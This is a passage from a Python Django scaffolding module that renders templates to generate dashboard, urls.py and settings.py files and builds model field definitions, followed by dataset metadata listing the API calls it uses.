loader.get_template('projectCore/applicationFileTemplates/app_index_html_template.txt')\n buf = StringIO()\n c = mako.runtime.Context(buf, applicationName=app_name)\n t.render_context(c)\n\n open(self.site_root + \"/\" + app_name + \"/templates/\" + app_name + \"/dashboard.html\", \"w+\").write(\n buf.getvalue())\n except Exception as e:\n logger.fatal(\"Exception occurred while creating dashboard.html file : %s\", e)\n application_creation_failed_signal.send(sender=Application.__class__, test=\"testString\",\n application=Application.objects.get(app_name=app_name))\n raise Exception('creation of dashboard.html failed: ' + str(e))\n return True\n\n def updateProjectUrlsPy(self):\n \"\"\"\n This method created the Urls.py file for the entire project using a template file.\n Method reads application table and create the necessary file.\n \"\"\"\n\n try:\n logger.info(\n \"\\n--------------------------------------------------------\\n\\t\\tRefreshing application list in urls.py\")\n copyfile(self.site_root + \"/\" + settings.APPLICATION_NAME + \"/urls.py\",\n self.site_root + \"/\" + settings.APPLICATION_NAME + \"/urls.py.backup\")\n t = loader.get_template('applicationManager/applicationFileTemplates/project_urls_py.txt')\n\n apps = Application.objects.all()\n\n c = {'applist': apps}\n rendered = t.render(c)\n\n open(self.site_root + \"/\" + settings.APPLICATION_NAME + \"/urls.py\", \"w+\").write(rendered)\n except Exception as e:\n raise Exception('updateProjectUrlsPy failed: '+str(e))\n # def updateProjectUrlsPy(self):\n # \"\"\"\n # This method created the Urls.py file for the entire project using a template file.\n #\n # \"\"\"\n # logger.info(\"\\n--------------------------------------------------------------\\n\\t\\t\"\n # \"Refreshing application list in urls.py\")\n # t = loader.get_template('applicationManager/applicationFileTemplates/project_urls_py.txt')\n #\n # app_nameList = getAppNameListByAppsPy()\n # print(\"Applications which will be created in database : \" + str(app_nameList))\n #\n # try:\n # allapps = Application.objects.all()\n # allapps.delete()\n # print(\"deleted applications table content\")\n # except Exception as e:\n # print(\"Deletion of database entries for applications failed\")\n #\n # appConfigs = []\n # for app_name in app_nameList:\n # pass\n # # Application config ile bu islemin yapilmasi durumu imkansiz: Cunku appconfig kullanmak icin\n # # app settings dosyasinda olmali ama bu durumda uygulama yeniden basladigi icin tum uygulama akisi\n # # resetlenmektedir.\n # # # confName = app_name+'AppConfig'\n # # print(app_name)\n # # appConf = apps.get_app_config(app_name)\n # # appConfigs.append(appConf)\n # # print(appConf)\n # # # print(appConf.yvar)\n #\n # c = Context({'applist': appConfigs})\n # rendered = t.render(c)\n #\n # # buf = StringIO()\n # # c = mako.runtime.Context(buf, applist=appConfigs)\n # # t.render_context(c)\n #\n # open(self.site_root + \"/\" + settings.APPLICATION_NAME + \"/urls.py\", \"w+\").write(rendered)\n\n # Updates only the settings file\n def updateProjectSettingsPy(self):\n try:\n copyfile(self.site_root + \"/\" + settings.APPLICATION_NAME + \"/settings.py\",\n self.site_root + \"/\" + settings.APPLICATION_NAME + \"/settings.py.\" + str(\n datetime.datetime.now().isoformat()))\n appList = Application.objects.all()\n print(\"List of applications to be added to the settings file :\" + str(appList))\n\n t = loader.get_template('applicationManager/applicationFileTemplates/project_settings_py.txt')\n c = {'appList': appList}\n 
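updateProjectUrlsPy and updateProjectSettingsPy both snapshot the current file before regenerating it, the latter under a timestamped name. A small sketch of that backup-then-regenerate step (note that the ':' characters in an ISO timestamp are not valid in Windows file names, so the suffix format may need adjusting):

```python
# Snapshot a file under a timestamped name before overwriting it with
# freshly rendered content, mirroring updateProjectSettingsPy.
import datetime
from shutil import copyfile


def backup_file(path):
    """Copy `path` to `path.<ISO timestamp>` and return the backup name."""
    stamp = datetime.datetime.now().isoformat()
    backup_path = '{0}.{1}'.format(path, stamp)
    copyfile(path, backup_path)
    return backup_path


# backup_file('myproject/settings.py')
# -> 'myproject/settings.py.2016-05-01T12:00:00.000000'
```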
rendered = t.render(c)\n open(self.site_root + \"/\" + settings.APPLICATION_NAME + \"/settings.py\", \"w+\").write(rendered)\n except Exception as e:\n\n logger.fatal(\"Exception occurred while updating project settings file : %s\", e)\n application_creation_failed_signal.send(sender=Application.__class__, test=\"testString\",\n application=Application.objects.get(app_name=self.application.app_name))\n raise Exception('creation of project settings.py failed: ' + str(e))\n\n def rollback(self):\n logger.error(\"Rolling back the installation\")\n raise NotImplementedError\n pass\n\n def get_import(self, model):\n for dir in os.listdir(self.site_root):\n if os.path.isdir('{0}{1}'.format(self.site_root, dir)) \\\n and os.path.exists('{0}{1}/models.py'.format(self.site_root, dir)):\n with open('{0}{1}/models.py'.format(self.site_root, dir), 'r') as fp:\n # Check if model exists\n for line in fp.readlines():\n if 'class {0}(models.Model)'.format(model) in line:\n # print \"Foreign key '%s' was found in app %s...\" % (model, dir)\n return IMPORT_MODEL_TEMPLATE % {'app': dir, 'model': model}\n return None\n\n def is_imported(self, path, model):\n with open(path, 'r') as import_file:\n for line in import_file.readlines():\n if 'import {0}'.format(model) in line:\n print(\"Foreign key '%s' was found in models.py...\" % (model))\n return True\n return False\n\n def is_declared(self, path, model):\n with open(path, 'r') as import_file:\n for line in import_file.readlines():\n if 'class {0}'.format(model.capitalize()) in line:\n logger.info(\"Foreign key '%s' was found in models.py...\" % (model))\n return True\n return False\n\n def get_type_parameters(self, field):\n # parameter list is assumed comma seperated equity phrases\n params = field.type_parameter\n\n if params == \"\":\n return None\n else:\n # try:\n # if isinstance(params,six.string_types):\n #\n # else:\n # print(params.__class__)\n # except ValueError as e:\n # logger.fatal(\"Json document is not well formatted : \"+params)\n\n pass\n\n def get_field(self, field):\n self.get_type_parameters(field)\n\n # Default vals\n field_name = field.name\n null_val = True\n blank_val = True\n lenght_val = \"255\"\n default_val = \"255\"\n digits_val = \"3\"\n places_val = \"3\"\n\n print(field)\n print(field.__class__)\n\n tp = field.type_parameter\n try:\n tp = tp.split(\",\")\n except:\n logger.warning(\"No comma seperated input\")\n\n for param in tp:\n try:\n param_key, param_val = param.split(\":\")\n except:\n logger.error(\"parameter format is not correct\")\n break\n\n if param_key.lower() == \"null\":\n null_val = param_val\n\n if param_key.lower() == \"blank\":\n blank_val = param_val\n\n if param_key.lower() == \"length\":\n lenght_val = param_val\n\n if param_key.lower() == \"default\":\n default_val = param_val\n\n if param_key.lower() == \"digits\":\n digits_val = param_val\n\n if param_key.lower() == \"places\":\n places_val = param_val\n\n if param_key.lower() == \"foreign\":\n foreign_val = param_val\n\n if field.type.lower() == 'char' or field.type.lower() == 'charfield' :\n return CHARFIELD_TEMPLATE % {'name': field_name, 'length': lenght_val, 'null': null_val, 'blank': blank_val}\n\n elif field.type.lower() == 'text' or field.type.lower() == 'textfield':\n return TEXTFIELD_TEMPLATE % {'name': field_name, 'null': null_val}\n\n elif field.type.lower() == 'int' or field.type.lower() == 'integerfield':\n return INTEGERFIELD_TEMPLATE % {'name': field_name, 'null': null_val, 'default': default_val}\n\n elif field.type.lower() == 
'decimal' or field.type.lower() == 'decimalfield':\n return DECIMALFIELD_TEMPLATE % {\n 'name': field_name,\n 'digits': digits_val,\n 'places': places_val,\n 'null': null_val,\n 'default': default_val,\n }\n elif field.type.lower() == 'datetime' or field.type.lower() == 'datetimesssfield':\n\n return DATETIMEFIELD_TEMPLATE % {'name': field_name, 'null': null_val, 'default': default_val}\n\n elif field.type.lower() == 'foreign':\n foreign = foreign_val\n name = field_name\n # Check if this foreign key is already in models.py\n if foreign in ('User', 'Group'):\n if not self.is_imported('{0}{1}/models.py'.format(self.site_root,\n self.application.app_name), foreign):\n self.imports.append('\\nfrom django.contrib.auth.models import User, Group\\n')\n return FOREIGNFIELD_TEMPLATE % {'name': name, 'foreign': foreign, 'null': 'True'}\n\n if self.is_imported('{0}{1}/models.py'.format(\n self.site_root, self.application.app_name), foreign) or self.is_declared('{0}{1}/models.py'.format(\n self.site_root, self.application.app_name), foreign):\n return FOREIGNFIELD_TEMPLATE % {'name': name, 'foreign': foreign, 'null': 'True'}\n\n # Check imports\n if self.get_import(foreign):\n self.imports.append(self.get_import(foreign))\n return FOREIGNFIELD_TEMPLATE % {'name': name, 'foreign': foreign, 'null': 'True'}\n\n logger.info('error\\t{0}{1}/models.py\\t{2} class not found'.format(\n self.site_root, self.application.app_name, foreign), 1)\n return None\n\n def model_exists(self, model_id, file):\n\n mfile = open(file.format(self.site_root, self.application.app_name, self.sub_models), 'r')\n lines = mfile.readlines()\n mfile.close()\n\n model_name = (AppModel.objects.get(id=model_id)).name\n\n for line in lines:\n if 'class ' + model_name + '(models.Model):'.format(self.application.app_name, self.sub_models) in line:\n return True\n return False\n\n", "sub_path": "util/soft_application_creator.py", "file_name": "soft_application_creator.py", "file_ext": "py", "file_size_in_byte": 45782, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "logging.getLogger", "line_number": 27, "usage_type": "call"}, {"api_name": "django.conf.settings.SITE_ROOT", "line_number": 80, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 80, "usage_type": "name"}, {"api_name": "django.conf.settings.SUB_MODEL_DIR", "line_number": 81, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 81, "usage_type": "name"}, {"api_name": "django.conf.settings.SCAFFOLD_APPS_DIR", "line_number": 84, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 84, "usage_type": "name"}, {"api_name": "applicationManager.models.SettingDefinition.objects.all", "line_number": 89, "usage_type": "call"}, {"api_name": "applicationManager.models.SettingDefinition.objects", "line_number": 89, "usage_type": "attribute"}, {"api_name": "applicationManager.models.SettingDefinition", "line_number": 89, "usage_type": "name"}, {"api_name": "applicationManager.models.ApplicationSettings.objects.create", "line_number": 92, "usage_type": "call"}, {"api_name": "applicationManager.models.ApplicationSettings.objects", "line_number": 92, "usage_type": "attribute"}, {"api_name": "applicationManager.models.ApplicationSettings", "line_number": 92, "usage_type": "name"}, {"api_name": "applicationManager.models.ApplicationUrl", "line_number": 96, "usage_type": "call"}, {"api_name": 
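get_field above splits type_parameter on commas and colons with a chain of if-tests, and a 'foreign' field whose parameter string omits the `foreign:` entry leaves `foreign_val` unbound, raising NameError. A hypothetical refactor that parses the string into a dict over explicit defaults, so unset keys can never be referenced before assignment:

```python
# Hypothetical replacement for get_field's parameter handling: parse a
# "key:value,key:value" string into a dict merged over defaults.
def parse_type_parameters(raw):
    defaults = {
        'null': 'True', 'blank': 'True', 'length': '255',
        'default': 'None', 'digits': '3', 'places': '3', 'foreign': None,
    }
    if not raw:
        return defaults
    for part in raw.split(','):
        key, sep, value = part.partition(':')
        if not sep:          # malformed chunk without a colon; skip it
            continue
        defaults[key.strip().lower()] = value.strip()
    return defaults


params = parse_type_parameters('length:100,null:False')
# {'length': '100', 'null': 'False', 'foreign': None, ...}
```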
"applicationManager.models.ApplicationView.objects.get", "line_number": 96, "usage_type": "call"}, {"api_name": "applicationManager.models.ApplicationView.objects", "line_number": 96, "usage_type": "attribute"}, {"api_name": "applicationManager.models.ApplicationView", "line_number": 96, "usage_type": "name"}, {"api_name": "applicationManager.models.ApplicationUrl", "line_number": 100, "usage_type": "call"}, {"api_name": "applicationManager.models.ApplicationView.objects.get", "line_number": 100, "usage_type": "call"}, {"api_name": "applicationManager.models.ApplicationView.objects", "line_number": 100, "usage_type": "attribute"}, {"api_name": "applicationManager.models.ApplicationView", "line_number": 100, "usage_type": "name"}, {"api_name": "applicationManager.models.ApplicationUrl", "line_number": 105, "usage_type": "call"}, {"api_name": "applicationManager.models.ApplicationView.objects.get", "line_number": 105, "usage_type": "call"}, {"api_name": "applicationManager.models.ApplicationView.objects", "line_number": 105, "usage_type": "attribute"}, {"api_name": "applicationManager.models.ApplicationView", "line_number": 105, "usage_type": "name"}, {"api_name": "applicationManager.models.ApplicationComponentTemplate.objects.get", "line_number": 113, "usage_type": "call"}, {"api_name": "applicationManager.models.ApplicationComponentTemplate.objects", "line_number": 113, "usage_type": "attribute"}, {"api_name": "applicationManager.models.ApplicationComponentTemplate", "line_number": 113, "usage_type": "name"}, {"api_name": "django.template.Template", "line_number": 117, "usage_type": "call"}, {"api_name": "django.template.Context", "line_number": 118, "usage_type": "call"}, {"api_name": "applicationManager.models.ApplicationView.objects.create", "line_number": 119, "usage_type": "call"}, {"api_name": "applicationManager.models.ApplicationView.objects", "line_number": 119, "usage_type": "attribute"}, {"api_name": "applicationManager.models.ApplicationView", "line_number": 119, "usage_type": "name"}, {"api_name": "applicationManager.models.ApplicationComponentTemplate.objects.get", "line_number": 124, "usage_type": "call"}, {"api_name": "applicationManager.models.ApplicationComponentTemplate.objects", "line_number": 124, "usage_type": "attribute"}, {"api_name": "applicationManager.models.ApplicationComponentTemplate", "line_number": 124, "usage_type": "name"}, {"api_name": "django.template.Template", "line_number": 128, "usage_type": "call"}, {"api_name": "django.template.Context", "line_number": 129, "usage_type": "call"}, {"api_name": "applicationManager.models.ApplicationView.objects.create", "line_number": 130, "usage_type": "call"}, {"api_name": "applicationManager.models.ApplicationView.objects", "line_number": 130, "usage_type": "attribute"}, {"api_name": "applicationManager.models.ApplicationView", "line_number": 130, "usage_type": "name"}, {"api_name": "applicationManager.models.ApplicationComponentTemplate.objects.get", "line_number": 134, "usage_type": "call"}, {"api_name": "applicationManager.models.ApplicationComponentTemplate.objects", "line_number": 134, "usage_type": "attribute"}, {"api_name": "applicationManager.models.ApplicationComponentTemplate", "line_number": 134, "usage_type": "name"}, {"api_name": "django.template.Template", "line_number": 138, "usage_type": "call"}, {"api_name": "django.template.Context", "line_number": 139, "usage_type": "call"}, {"api_name": "applicationManager.models.ApplicationView.objects.create", "line_number": 140, "usage_type": "call"}, 
{"api_name": "applicationManager.models.ApplicationView.objects", "line_number": 140, "usage_type": "attribute"}, {"api_name": "applicationManager.models.ApplicationView", "line_number": 140, "usage_type": "name"}, {"api_name": "applicationManager.models.ApplicationView.objects.filter", "line_number": 146, "usage_type": "call"}, {"api_name": "applicationManager.models.ApplicationView.objects", "line_number": 146, "usage_type": "attribute"}, {"api_name": "applicationManager.models.ApplicationView", "line_number": 146, "usage_type": "name"}, {"api_name": "types.ModuleType", "line_number": 147, "usage_type": "call"}, {"api_name": "sys.modules", "line_number": 148, "usage_type": "attribute"}, {"api_name": "applicationManager.models.ApplicationUrl.objects.filter", "line_number": 157, "usage_type": "call"}, {"api_name": "applicationManager.models.ApplicationUrl.objects", "line_number": 157, "usage_type": "attribute"}, {"api_name": "applicationManager.models.ApplicationUrl", "line_number": 157, "usage_type": "name"}, {"api_name": "types.ModuleType", "line_number": 160, "usage_type": "call"}, {"api_name": "sys.modules", "line_number": 161, "usage_type": "attribute"}, {"api_name": "django.urls.path", "line_number": 164, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 217, "usage_type": "call"}, {"api_name": "os.path", "line_number": 217, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 222, "usage_type": "call"}, {"api_name": "os.path", "line_number": 222, "usage_type": "attribute"}, {"api_name": "io.StringIO", "line_number": 241, "usage_type": "call"}, {"api_name": "django.core.management.call_command", "line_number": 249, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 313, "usage_type": "call"}, {"api_name": "os.path", "line_number": 313, "usage_type": "attribute"}, {"api_name": "django.template.loader.get_template", "line_number": 316, "usage_type": "call"}, {"api_name": "django.template.loader", "line_number": 316, "usage_type": "name"}, {"api_name": "applicationManager.signals.signals.application_creation_failed_signal.send", "line_number": 324, "usage_type": "call"}, {"api_name": "applicationManager.signals.signals.application_creation_failed_signal", "line_number": 324, "usage_type": "name"}, {"api_name": "applicationManager.models.Application.__class__", "line_number": 324, "usage_type": "attribute"}, {"api_name": "applicationManager.models.Application", "line_number": 324, "usage_type": "name"}, {"api_name": "applicationManager.models.Application.objects.get", "line_number": 325, "usage_type": "call"}, {"api_name": "applicationManager.models.Application.objects", "line_number": 325, "usage_type": "attribute"}, {"api_name": "applicationManager.models.Application", "line_number": 325, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 335, "usage_type": "call"}, {"api_name": "os.path", "line_number": 335, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 347, "usage_type": "call"}, {"api_name": "os.path", "line_number": 347, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 348, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 351, "usage_type": "call"}, {"api_name": "os.path", "line_number": 351, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 352, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 354, "usage_type": "call"}, {"api_name": "os.path", "line_number": 354, "usage_type": "attribute"}, 
{"api_name": "os.makedirs", "line_number": 355, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 356, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 358, "usage_type": "call"}, {"api_name": "os.path", "line_number": 358, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 359, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 361, "usage_type": "call"}, {"api_name": "os.path", "line_number": 361, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 362, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 364, "usage_type": "call"}, {"api_name": "os.path", "line_number": 364, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 365, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 366, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 368, "usage_type": "call"}, {"api_name": "shutil.copyfile", "line_number": 370, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 374, "usage_type": "call"}, {"api_name": "shutil.copyfile", "line_number": 375, "usage_type": "call"}, {"api_name": "applicationManager.signals.signals.application_creation_failed_signal.send", "line_number": 382, "usage_type": "call"}, {"api_name": "applicationManager.signals.signals.application_creation_failed_signal", "line_number": 382, "usage_type": "name"}, {"api_name": "applicationManager.models.Application.__class__", "line_number": 382, "usage_type": "attribute"}, {"api_name": "applicationManager.models.Application", "line_number": 382, "usage_type": "name"}, {"api_name": "applicationManager.models.Application.objects.get", "line_number": 383, "usage_type": "call"}, {"api_name": "applicationManager.models.Application.objects", "line_number": 383, "usage_type": "attribute"}, {"api_name": "applicationManager.models.Application", "line_number": 383, "usage_type": "name"}, {"api_name": "django.template.loader.get_template", "line_number": 394, "usage_type": "call"}, {"api_name": "django.template.loader", "line_number": 394, "usage_type": "name"}, {"api_name": "applicationManager.signals.signals.application_creation_failed_signal.send", "line_number": 403, "usage_type": "call"}, {"api_name": "applicationManager.signals.signals.application_creation_failed_signal", "line_number": 403, "usage_type": "name"}, {"api_name": "applicationManager.models.Application.__class__", "line_number": 403, "usage_type": "attribute"}, {"api_name": "applicationManager.models.Application", "line_number": 403, "usage_type": "name"}, {"api_name": "applicationManager.models.Application.objects.get", "line_number": 404, "usage_type": "call"}, {"api_name": "applicationManager.models.Application.objects", "line_number": 404, "usage_type": "attribute"}, {"api_name": "applicationManager.models.Application", "line_number": 404, "usage_type": "name"}, {"api_name": "django.template.loader.get_template", "line_number": 412, "usage_type": "call"}, {"api_name": "django.template.loader", "line_number": 412, "usage_type": "name"}, {"api_name": "applicationManager.signals.signals.application_creation_failed_signal.send", "line_number": 422, "usage_type": "call"}, {"api_name": "applicationManager.signals.signals.application_creation_failed_signal", "line_number": 422, "usage_type": "name"}, {"api_name": "applicationManager.models.Application.__class__", "line_number": 422, "usage_type": "attribute"}, {"api_name": "applicationManager.models.Application", "line_number": 422, "usage_type": 
"name"}, {"api_name": "applicationManager.models.Application.objects.get", "line_number": 423, "usage_type": "call"}, {"api_name": "applicationManager.models.Application.objects", "line_number": 423, "usage_type": "attribute"}, {"api_name": "applicationManager.models.Application", "line_number": 423, "usage_type": "name"}, {"api_name": "django.template.loader.get_template", "line_number": 427, "usage_type": "call"}, {"api_name": "django.template.loader", "line_number": 427, "usage_type": "name"}, {"api_name": "applicationManager.signals.signals.application_creation_failed_signal.send", "line_number": 436, "usage_type": "call"}, {"api_name": "applicationManager.signals.signals.application_creation_failed_signal", "line_number": 436, "usage_type": "name"}, {"api_name": "applicationManager.models.Application.__class__", "line_number": 436, "usage_type": "attribute"}, {"api_name": "applicationManager.models.Application", "line_number": 436, "usage_type": "name"}, {"api_name": "applicationManager.models.Application.objects.get", "line_number": 437, "usage_type": "call"}, {"api_name": "applicationManager.models.Application.objects", "line_number": 437, "usage_type": "attribute"}, {"api_name": "applicationManager.models.Application", "line_number": 437, "usage_type": "name"}, {"api_name": "django.template.loader.get_template", "line_number": 446, "usage_type": "call"}, {"api_name": "django.template.loader", "line_number": 446, "usage_type": "name"}, {"api_name": "applicationManager.signals.signals.application_creation_failed_signal.send", "line_number": 455, "usage_type": "call"}, {"api_name": "applicationManager.signals.signals.application_creation_failed_signal", "line_number": 455, "usage_type": "name"}, {"api_name": "applicationManager.models.Application.__class__", "line_number": 455, "usage_type": "attribute"}, {"api_name": "applicationManager.models.Application", "line_number": 455, "usage_type": "name"}, {"api_name": "applicationManager.models.Application.objects.get", "line_number": 456, "usage_type": "call"}, {"api_name": "applicationManager.models.Application.objects", "line_number": 456, "usage_type": "attribute"}, {"api_name": "applicationManager.models.Application", "line_number": 456, "usage_type": "name"}, {"api_name": "django.template.loader.get_template", "line_number": 478, "usage_type": "call"}, {"api_name": "django.template.loader", "line_number": 478, "usage_type": "name"}, {"api_name": "django.template.loader.get_template", "line_number": 486, "usage_type": "call"}, {"api_name": "django.template.loader", "line_number": 486, "usage_type": "name"}, {"api_name": "applicationManager.signals.signals.application_creation_failed_signal.send", "line_number": 496, "usage_type": "call"}, {"api_name": "applicationManager.signals.signals.application_creation_failed_signal", "line_number": 496, "usage_type": "name"}, {"api_name": "applicationManager.models.Application.__class__", "line_number": 496, "usage_type": "attribute"}, {"api_name": "applicationManager.models.Application", "line_number": 496, "usage_type": "name"}, {"api_name": "applicationManager.models.Application.objects.get", "line_number": 497, "usage_type": "call"}, {"api_name": "applicationManager.models.Application.objects", "line_number": 497, "usage_type": "attribute"}, {"api_name": "applicationManager.models.Application", "line_number": 497, "usage_type": "name"}, {"api_name": "django.template.loader.get_template", "line_number": 511, "usage_type": "call"}, {"api_name": "django.template.loader", "line_number": 511, 
"usage_type": "name"}, {"api_name": "applicationManager.signals.signals.application_creation_failed_signal.send", "line_number": 518, "usage_type": "call"}, {"api_name": "applicationManager.signals.signals.application_creation_failed_signal", "line_number": 518, "usage_type": "name"}, {"api_name": "applicationManager.models.Application.__class__", "line_number": 518, "usage_type": "attribute"}, {"api_name": "applicationManager.models.Application", "line_number": 518, "usage_type": "name"}, {"api_name": "applicationManager.models.Application.objects.get", "line_number": 519, "usage_type": "call"}, {"api_name": "applicationManager.models.Application.objects", "line_number": 519, "usage_type": "attribute"}, {"api_name": "applicationManager.models.Application", "line_number": 519, "usage_type": "name"}, {"api_name": "applicationManager.models.AppModel.objects.get", "line_number": 539, "usage_type": "call"}, {"api_name": "applicationManager.models.AppModel.objects", "line_number": 539, "usage_type": "attribute"}, {"api_name": "applicationManager.models.AppModel", "line_number": 539, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 558, "usage_type": "call"}, {"api_name": "os.path", "line_number": 558, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 559, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 580, "usage_type": "call"}, {"api_name": "os.path", "line_number": 580, "usage_type": "attribute"}, {"api_name": "applicationManager.models.AppModel.objects.get", "line_number": 615, "usage_type": "call"}, {"api_name": "applicationManager.models.AppModel.objects", "line_number": 615, "usage_type": "attribute"}, {"api_name": "applicationManager.models.AppModel", "line_number": 615, "usage_type": "name"}, {"api_name": "applicationManager.models.AppModel.objects.get", "line_number": 661, "usage_type": "call"}, {"api_name": "applicationManager.models.AppModel.objects", "line_number": 661, "usage_type": "attribute"}, {"api_name": "applicationManager.models.AppModel", "line_number": 661, "usage_type": "name"}, {"api_name": "django.template.Template", "line_number": 701, "usage_type": "call"}, {"api_name": "io.StringIO", "line_number": 704, "usage_type": "call"}, {"api_name": "mako.runtime.Context", "line_number": 705, "usage_type": "call"}, {"api_name": "mako.runtime", "line_number": 705, "usage_type": "attribute"}, {"api_name": "applicationManager.signals.signals.application_creation_failed_signal.send", "line_number": 712, "usage_type": "call"}, {"api_name": "applicationManager.signals.signals.application_creation_failed_signal", "line_number": 712, "usage_type": "name"}, {"api_name": "applicationManager.models.Application.__class__", "line_number": 712, "usage_type": "attribute"}, {"api_name": "applicationManager.models.Application", "line_number": 712, "usage_type": "name"}, {"api_name": "applicationManager.models.Application.objects.get", "line_number": 713, "usage_type": "call"}, {"api_name": "applicationManager.models.Application.objects", "line_number": 713, "usage_type": "attribute"}, {"api_name": "applicationManager.models.Application", "line_number": 713, "usage_type": "name"}, {"api_name": "django.template.Template", "line_number": 717, "usage_type": "call"}, {"api_name": "io.StringIO", "line_number": 720, "usage_type": "call"}, {"api_name": "mako.runtime.Context", "line_number": 721, "usage_type": "call"}, {"api_name": "mako.runtime", "line_number": 721, "usage_type": "attribute"}, {"api_name": 
"applicationManager.signals.signals.application_creation_failed_signal.send", "line_number": 728, "usage_type": "call"}, {"api_name": "applicationManager.signals.signals.application_creation_failed_signal", "line_number": 728, "usage_type": "name"}, {"api_name": "applicationManager.models.Application.__class__", "line_number": 728, "usage_type": "attribute"}, {"api_name": "applicationManager.models.Application", "line_number": 728, "usage_type": "name"}, {"api_name": "applicationManager.models.Application.objects.get", "line_number": 729, "usage_type": "call"}, {"api_name": "applicationManager.models.Application.objects", "line_number": 729, "usage_type": "attribute"}, {"api_name": "applicationManager.models.Application", "line_number": 729, "usage_type": "name"}, {"api_name": "django.template.Template", "line_number": 732, "usage_type": "call"}, {"api_name": "io.StringIO", "line_number": 734, "usage_type": "call"}, {"api_name": "mako.runtime.Context", "line_number": 735, "usage_type": "call"}, {"api_name": "mako.runtime", "line_number": 735, "usage_type": "attribute"}, {"api_name": "applicationManager.signals.signals.application_creation_failed_signal.send", "line_number": 743, "usage_type": "call"}, {"api_name": "applicationManager.signals.signals.application_creation_failed_signal", "line_number": 743, "usage_type": "name"}, {"api_name": "applicationManager.models.Application.__class__", "line_number": 743, "usage_type": "attribute"}, {"api_name": "applicationManager.models.Application", "line_number": 743, "usage_type": "name"}, {"api_name": "applicationManager.models.Application.objects.get", "line_number": 744, "usage_type": "call"}, {"api_name": "applicationManager.models.Application.objects", "line_number": 744, "usage_type": "attribute"}, {"api_name": "applicationManager.models.Application", "line_number": 744, "usage_type": "name"}, {"api_name": "django.template.Template", "line_number": 747, "usage_type": "call"}, {"api_name": "io.StringIO", "line_number": 749, "usage_type": "call"}, {"api_name": "mako.runtime.Context", "line_number": 750, "usage_type": "call"}, {"api_name": "mako.runtime", "line_number": 750, "usage_type": "attribute"}, {"api_name": "applicationManager.signals.signals.application_creation_failed_signal.send", "line_number": 758, "usage_type": "call"}, {"api_name": "applicationManager.signals.signals.application_creation_failed_signal", "line_number": 758, "usage_type": "name"}, {"api_name": "applicationManager.models.Application.__class__", "line_number": 758, "usage_type": "attribute"}, {"api_name": "applicationManager.models.Application", "line_number": 758, "usage_type": "name"}, {"api_name": "applicationManager.models.Application.objects.get", "line_number": 759, "usage_type": "call"}, {"api_name": "applicationManager.models.Application.objects", "line_number": 759, "usage_type": "attribute"}, {"api_name": "applicationManager.models.Application", "line_number": 759, "usage_type": "name"}, {"api_name": "django.template.Template", "line_number": 763, "usage_type": "call"}, {"api_name": "io.StringIO", "line_number": 765, "usage_type": "call"}, {"api_name": "mako.runtime.Context", "line_number": 766, "usage_type": "call"}, {"api_name": "mako.runtime", "line_number": 766, "usage_type": "attribute"}, {"api_name": "applicationManager.signals.signals.application_creation_failed_signal.send", "line_number": 774, "usage_type": "call"}, {"api_name": "applicationManager.signals.signals.application_creation_failed_signal", "line_number": 774, "usage_type": "name"}, 
{"api_name": "applicationManager.models.Application.__class__", "line_number": 774, "usage_type": "attribute"}, {"api_name": "applicationManager.models.Application", "line_number": 774, "usage_type": "name"}, {"api_name": "applicationManager.models.Application.objects.get", "line_number": 775, "usage_type": "call"}, {"api_name": "applicationManager.models.Application.objects", "line_number": 775, "usage_type": "attribute"}, {"api_name": "applicationManager.models.Application", "line_number": 775, "usage_type": "name"}, {"api_name": "django.template.Template", "line_number": 779, "usage_type": "call"}, {"api_name": "io.StringIO", "line_number": 781, "usage_type": "call"}, {"api_name": "mako.runtime.Context", "line_number": 782, "usage_type": "call"}, {"api_name": "mako.runtime", "line_number": 782, "usage_type": "attribute"}, {"api_name": "applicationManager.signals.signals.application_creation_failed_signal.send", "line_number": 791, "usage_type": "call"}, {"api_name": "applicationManager.signals.signals.application_creation_failed_signal", "line_number": 791, "usage_type": "name"}, {"api_name": "applicationManager.models.Application.__class__", "line_number": 791, "usage_type": "attribute"}, {"api_name": "applicationManager.models.Application", "line_number": 791, "usage_type": "name"}, {"api_name": "applicationManager.models.Application.objects.get", "line_number": 792, "usage_type": "call"}, {"api_name": "applicationManager.models.Application.objects", "line_number": 792, "usage_type": "attribute"}, {"api_name": "applicationManager.models.Application", "line_number": 792, "usage_type": "name"}, {"api_name": "django.template.Template", "line_number": 796, "usage_type": "call"}, {"api_name": "io.StringIO", "line_number": 798, "usage_type": "call"}, {"api_name": "mako.runtime.Context", "line_number": 799, "usage_type": "call"}, {"api_name": "mako.runtime", "line_number": 799, "usage_type": "attribute"}, {"api_name": "applicationManager.signals.signals.application_creation_failed_signal.send", "line_number": 807, "usage_type": "call"}, {"api_name": "applicationManager.signals.signals.application_creation_failed_signal", "line_number": 807, "usage_type": "name"}, {"api_name": "applicationManager.models.Application.__class__", "line_number": 807, "usage_type": "attribute"}, {"api_name": "applicationManager.models.Application", "line_number": 807, "usage_type": "name"}, {"api_name": "applicationManager.models.Application.objects.get", "line_number": 808, "usage_type": "call"}, {"api_name": "applicationManager.models.Application.objects", "line_number": 808, "usage_type": "attribute"}, {"api_name": 